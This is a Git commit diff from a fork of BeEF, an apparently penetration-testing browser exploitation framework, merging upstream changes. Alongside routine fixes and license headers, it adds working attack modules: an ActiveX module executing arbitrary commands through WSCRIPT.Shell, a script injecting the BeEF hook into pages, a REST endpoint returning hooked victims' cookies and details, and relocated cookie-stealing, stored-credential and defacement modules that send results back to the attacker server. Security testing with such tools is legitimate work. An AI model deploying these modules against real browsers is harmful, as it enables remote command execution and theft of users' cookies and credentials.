Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

Browse Source
This commit is contained in:
antisnatchor
2012-05-02 13:04:51 +03:00
parent 97c2649e36 b78390cd39
commit 9ae0929a8c
117 changed files with 2323 additions and 60 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
core/main/client/browser.js
View File

@@ -49,7 +49,7 @@ beef.browser = {
* @example: beef.browser.isIE8()
*/
isIE8: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !window.performance;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance;
},
/**
@@ -57,7 +57,7 @@ beef.browser = {
* @example: beef.browser.isIE9()
*/
isIE9: function() {
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
},
/**

50
core/main/client/net/xssrays.js
View File

@@ -106,7 +106,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && !beef.browser.isIE()) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
}
},
@@ -188,6 +188,13 @@ beef.net.xssrays = {
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&|&/);
if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i < target.search.length; i++) {
target.search[i] = target.search[i].split('=');
@@ -204,20 +211,20 @@ beef.net.xssrays = {
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
@@ -372,11 +379,20 @@ beef.net.xssrays = {
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
if(beef.browser.isIE()){
try {
var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
@@ -440,11 +456,13 @@ beef.net.xssrays = {
numOfConnections++;
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
try{
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
}
}

2
core/main/client/session.js
View File

@@ -82,7 +82,7 @@ beef.session = {
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistant: function() {
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{

1
core/main/network_stack/assethandler.rb
View File

@@ -56,6 +56,7 @@ module Handlers
@allocations.delete(url)
@http_server.unmount(url)
@http_server.remap
print_info "Url [" + url + "] unmounted"
end
# Builds a URL based on the path and extension, if neither are passed a random URL will be generated

18
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -30,6 +30,11 @@ module BeEF
'Expires' => '0'
end
# @note Return a can of Leffe to the thirsty Bovine Security Team member. AthCon2012 joke /antisnatchor/
#get "/to/a/pub"
# "BeER please"
#end
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
@@ -44,6 +49,19 @@ module BeEF
output.to_json
end
# @note Get all the hooked browser details (plugins enabled, technologies enabled, cookies)
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
details = BeEF::Core::Models::BrowserDetails.all(:session_id => hb.session)
result = {}
details.each do |property|
result[property.detail_key] = property.detail_value
end
result.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0

77
extensions/admin_ui/media/javascript/ui/panel/HooksTab.js Normal file
View File

@@ -0,0 +1,77 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
HooksTab = function() {
/*
* The panel used to configure the hook.
********************************************/
var hooks_panel = new Ext.FormPanel({
title: 'Hooks',
id: 'hooks-panel',
hideLabels : false,
border: false,
padding: '3px 5px 0 5px',
items:[{
fieldLabel: 'Text',
xtype: 'textarea',
id: 'inputText',
name: 'inputText',
width: '100%',
height: '40%',
allowBlank: true
},{
fieldLabel: 'Result',
xtype: 'textarea',
id: 'resultText',
name: 'resultText',
width: '100%',
height: '40%',
allowBlank: true
}],
buttons: [{
text: 'Add Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
},{
text: 'Delete Hook',
handler: function() {
var form = Ext.getCmp('hooks-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
form.setValues({resultText: result});
}
}]
});
HooksTab.superclass.constructor.call(this, {
region: 'center',
items: [hooks_panel],
autoScroll: true,
border: false
});
};
Ext.extend(HooksTab,Ext.Panel, {});

10
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -41,6 +41,7 @@ MainPanel = function(){
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;
//this.hackvertor_tab = new HackVertorTab;
MainPanel.superclass.constructor.call(this, {
@@ -71,7 +72,14 @@ MainPanel = function(){
items:[
this.grid
/*
]},{
]},{
id:'hooks-view',
layout:'border',
title:'Hooks',
hideMode:'offsets',
items:[
//this.hooks_tab
]},{
id:'hackvertor-view',
layout:'border',
title:'HackVertor',

1
extensions/demos/html/basic.html
View File

@@ -1,3 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>

5
extensions/demos/html/plain.html Normal file
View File

@@ -0,0 +1,5 @@
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

4
extensions/xssrays/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 5000
clean_timeout: 3000
cross_domain: true
# set js_console_logs to false when using BeEF in production (also because IE browser doesn't support the console object)
# set js_console_logs to false when using BeEF in production (also because IE < 9 doesn't support the console object)
js_console_logs: false

1
extensions/xssrays/handler.rb
View File

@@ -48,7 +48,6 @@ module BeEF
headers 'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST,GET'

4
modules/browser/detect_firebug/command.js
View File

@@ -14,8 +14,8 @@
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
var result = "Not in use or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

39
modules/browser/google_search/command.js Normal file
View File

@@ -0,0 +1,39 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var query = '<%= @query.gsub(/'/, "\\'") %>';
var searchGoogle = function(query) {
var script = document.createElement('script');
script.defer = true;
script.type = "text/javascript";
script.src = "https://ajax.googleapis.com/ajax/services/search/web?callback=callback&lstkp=0&rsz=large&hl=en&q=" + query + "&v=1.0";
callback = function (results) {
document.body.removeChild(script);
delete callback;
beef.net.send('<%= @command_url %>', <%= @command_id %>, "query="+query+"&results="+JSON.stringify(results));
};
document.body.appendChild(script);
}
searchGoogle(query);
});

25
modules/browser/google_search/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
google_search:
enable: true
category: "Browser"
name: "Google Search"
description: "This module uses the hooked browser to search Google."
authors: ["bcoles"]
target:
working: ["ALL"]

32
modules/browser/google_search/module.rb Normal file
View File

@@ -0,0 +1,32 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Google_search < BeEF::Core::Command
def self.options
return [
{'name' => 'query', 'ui_label' => 'Query', 'type' => 'textarea', 'value' =>'beef', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
content['query'] = @datastore['query']
save content
end
end

1037
modules/chrome_extensions/get_chrome_extensions/command.js Normal file
View File

File diff suppressed because it is too large Load Diff

26
modules/chrome_extensions/get_chrome_extensions/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_chrome_extensions:
enable: true
category: "Chrome Extensions"
name: "Get Chrome Extensions"
description: "This module detects if any of the top 1,000 Chrome extensions are installed."
authors: ["koto", "bcoles"]
target:
working: ["C"]
not_working: ["All"]

28
modules/chrome_extensions/get_chrome_extensions/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# More info:
# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
#
class Detect_chrome_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end

15
modules/chrome_extensions/inject_beef/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;

15
modules/chrome_extensions/inject_beef/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
inject_beef:

15
modules/chrome_extensions/inject_beef/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Inject_beef < BeEF::Core::Command
def post_execute

15
modules/chrome_extensions/send_gvoice_sms/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var to = "<%= @to %>";
var message = "<%= @message %>";

15
modules/chrome_extensions/send_gvoice_sms/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
send_gvoice_sms:

15
modules/chrome_extensions/send_gvoice_sms/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Send_gvoice_sms < BeEF::Core::Command
def self.options

34
modules/exploits/activex_command_execution/command.js Executable file
View File

@@ -0,0 +1,34 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
var result = "command was not sent";
try {
var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);
if (shell.toString() == 0) {
result = "command sent";
} else {
result = "command failed";
}
} catch(e) {
result = "command failed";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

26
modules/exploits/activex_command_execution/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
activex_command_execution:
enable: true
category: "Exploits"
name: "ActiveX Command Execution"
description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
authors: ["bcoles"]
target:
user_notify: ["IE"]
not_working: ["ALL"]

28
modules/exploits/activex_command_execution/module.rb Executable file
View File

@@ -0,0 +1,28 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Activex_command_execution < BeEF::Core::Command
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

96
modules/hooked_domain/ajax_fingerprint/command.js Normal file
View File

@@ -0,0 +1,96 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
//Regular expression to match script names in source
var regex = new RegExp('/\\w*\.(min\.)?js');
var results = [];
var urls = "";
Array.prototype.unique = function() {
var o = {}, i, l = this.length, r = [];
for(i=0; i<l;i+=1) o[this[i]] = this[i];
for(i in o) r.push(o[i]);
return r;
};
// Fingerprints of javascript /ajax libraries . Library Name: Array of common file names
var fingerprints = {
"Prototype":new Array("prototype"),
"script.aculous":new Array("builder","controls","dragdrop","effects","scriptaculous","slider","unittest"),
"Dojo":new Array("dojo.uncompressed","uncompressed","dojo"),
"DWR":new Array("auth","engine","util"),
"Moo.fx/":new Array("Moo","Function","Array","String","Element","Fx","Dom","Ajax","Drag","Windows","Cookie","Json","Sortable","Fxpack","Fxutils","Fxtransition","Tips","Accordion"),
"Rico": new Array("rico","ricoAjax","ricoCommon","ricoEffects","ricoBehaviours","ricoDragDrop","ricoComponents"),
"Mootools":new Array("mootools","mootools-core-1.4-full","mootools-more-1.4-full"),
"Mochikit":new Array("Mochikit"),
"Yahoo UI!": new Array("animation","autocomplete","calendar","connection","container","dom","enevet","logger","menu","slider","tabview","treeview","utilities","yahoo","yahoo-dom-event"),
"xjax":new Array("xajax","xajax_uncompressed"),
"GWT": new Array("gwt","search-results"),
"Atlas": new Array("AtlasRuntime","AtlasBindings","AtlasCompat","AtlasCompat2"),
"jquery":new Array("jquery","jquery-latest","jquery-latest","jquery-1.5"),
"ExtJS":new Array("ext-all"),
"Prettify":new Array("prettify"),
"Spry": new Array("SpryTabbedPanels","SpryDOMUtils","SpryData","SpryXML","SpryUtils","SpryURLUtils","SpryDataExtensions","SpryDataShell","SpryEffects","SpryPagedView","SpryXML"),
"Google JS Libs":new Array("xpath","urchin","ga"),
"Libxmlrequest":new Array("libxmlrequest"),
"jx":new Array ("jx","jxs"),
"bajax":new Array("bajax"),
"AJS": new Array ("AJS","AJS_fx"),
"Greybox":new Array("gb_scripts.js"),
"Qooxdoo":new Array("qx.website-devel","qooxdoo-1.6","qooxdoo-1.5.1","qxserver","q","q.domain","q.sticky","q.placeholder","shCore","shBrushScript"),
};
function fp() {
try{
var sc = document.scripts;
var urls ="";
var source = ""
if (sc != null){
for (sc in document.scripts){
source =document.scripts[sc]['src'] || "";
if(source !=""){
//get the script file name and remove unnecessary endings and such
var comp = source.match(regex).toString().replace(new RegExp("/|.min|.pack|.uncompressed|.js\\W","g"),"");
for (key in fingerprints){
for (name in fingerprints[key]){
// match name in the fingerprint object
if(comp==fingerprints[key][name]){
results.push("Lib:"+key+" src:"+source);
}
}
}
}
}
}
if(results.length >0){
urls=results.unique().join('||');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
}
else{
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);
}
}
catch(e){
results = "Fingerprint failed: "+e.message;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+results.toString());
}
}
fp();
});

27
modules/hooked_domain/ajax_fingerprint/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
ajax_fingerprint:
enable: true
category: "Host"
name: "Hooked Domain"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
working: ["FF","S"]
not_working: ["C"]

27
modules/hooked_domain/ajax_fingerprint/module.rb Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Ajax_fingerprint < BeEF::Core::Command
def post_execute
content = {}
content['script_urls'] = @datastore['script_urls'] if not @datastore['script_urls'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint ajax.'
end
save content
end
end

0
modules/browser/alert_dialog/command.js → modules/hooked_domain/alert_dialog/command.js
View File

2
modules/browser/alert_dialog/config.yaml → modules/hooked_domain/alert_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]

0
modules/browser/alert_dialog/module.rb → modules/hooked_domain/alert_dialog/module.rb
View File

0
modules/browser/deface_web_page/command.js → modules/hooked_domain/deface_web_page/command.js
View File

2
modules/browser/deface_web_page/config.yaml → modules/hooked_domain/deface_web_page/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Content (Deface)"
description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string."
authors: ["antisnatchor"]

0
modules/browser/deface_web_page/module.rb → modules/hooked_domain/deface_web_page/module.rb
View File

0
modules/browser/get_cookie/command.js → modules/hooked_domain/get_cookie/command.js
View File

2
modules/browser/get_cookie/config.yaml → modules/hooked_domain/get_cookie/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]

0
modules/browser/get_cookie/module.rb → modules/hooked_domain/get_cookie/module.rb
View File

0
modules/browser/get_local_storage/command.js → modules/hooked_domain/get_local_storage/command.js
View File

3
modules/browser/get_local_storage/config.yaml → modules/hooked_domain/get_local_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]
@@ -39,4 +39,5 @@ beef:
S:
min_ver: 4
max_ver: latest
not_working: ["ALL"]

0
modules/browser/get_local_storage/module.rb → modules/hooked_domain/get_local_storage/module.rb
View File

0
modules/browser/get_page_html/command.js → modules/hooked_domain/get_page_html/command.js
View File

2
modules/browser/get_page_html/config.yaml → modules/hooked_domain/get_page_html/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]

0
modules/browser/get_page_html/module.rb → modules/hooked_domain/get_page_html/module.rb
View File

0
modules/browser/get_page_links/command.js → modules/hooked_domain/get_page_links/command.js
View File

2
modules/browser/get_page_links/config.yaml → modules/hooked_domain/get_page_links/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]

0
modules/browser/get_page_links/module.rb → modules/hooked_domain/get_page_links/module.rb
View File

0
modules/browser/get_session_storage/command.js → modules/hooked_domain/get_session_storage/command.js
View File

3
modules/browser/get_session_storage/config.yaml → modules/hooked_domain/get_session_storage/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]
@@ -39,3 +39,4 @@ beef:
S:
min_ver: 4
max_ver: latest
not_working: ["ALL"]

0
modules/browser/get_session_storage/module.rb → modules/hooked_domain/get_session_storage/module.rb
View File

0
modules/browser/get_stored_credentials/command.js → modules/hooked_domain/get_stored_credentials/command.js
View File

2
modules/browser/get_stored_credentials/config.yaml → modules/hooked_domain/get_stored_credentials/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Get Stored Credentials"
